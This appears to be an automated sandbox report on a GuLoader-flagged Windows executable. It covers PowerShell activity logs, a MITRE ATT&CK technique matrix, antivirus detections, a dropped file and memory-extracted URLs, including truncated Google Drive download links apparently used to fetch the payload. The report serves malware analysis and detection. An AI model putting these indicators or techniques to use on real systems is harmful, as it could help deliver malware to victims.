      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts411
      Process Injection      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      av8XPPpdBc.exe49%VirustotalBrowse
      av8XPPpdBc.exe62%ReversingLabsWin32.Trojan.GuLoader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Autocueing.exe62%ReversingLabsWin32.Trojan.GuLoader
      C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://drive.userco0%Avira URL Cloudsafe
      https://drive.google.com%Ur0%Avira URL Cloudsafe
      https://drive.usercontent.go0%Avira URL Cloudsafe
      https://www.google-analytics.0%Avira URL Cloudsafe
      https://ssl.g0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.185.142
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.185.129
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://translate.google.com/translate_a/elemAutocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.usercoAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqAutocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&ehAutocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/xAutocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://crl.microsoftpowershell.exe, 00000002.00000002.2522268759.00000000073D0000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.google.com/sAutocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/rAutocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.usercontent.google.com/%Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/pAutocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/i$Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830392198.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.comAutocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdAutocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                    		high
                                    https://drive.google.com/wnloadAutocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.google.com/XAutocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2516453019.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/d.google.comAutocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.google.com/Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.usercontent.google.com/download?id=1_v7mPqiekatAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                      		high
                                                      https://drive.usercontent.google.com/download?id=1_v7mPqiekapAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.comAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontent.google.com/download?id=1_v7mPAutocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://drive.usercontent.google.com/zAutocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.usercontent.google.com/ch=Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://apis.google.comAutocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/eXrAutocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3380044025.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3369098022.000000000349F000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357341329.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3346141316.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/iAutocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://drive.google.com/hAutocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2516453019.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.google.com/fAutocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzKdAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://drive.google.com%UrAutocueing.exe, 00000008.00000003.2818652713.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830392198.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2807502371.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://drive.google.com/bAutocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzOeAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAutocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google-analytics.Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
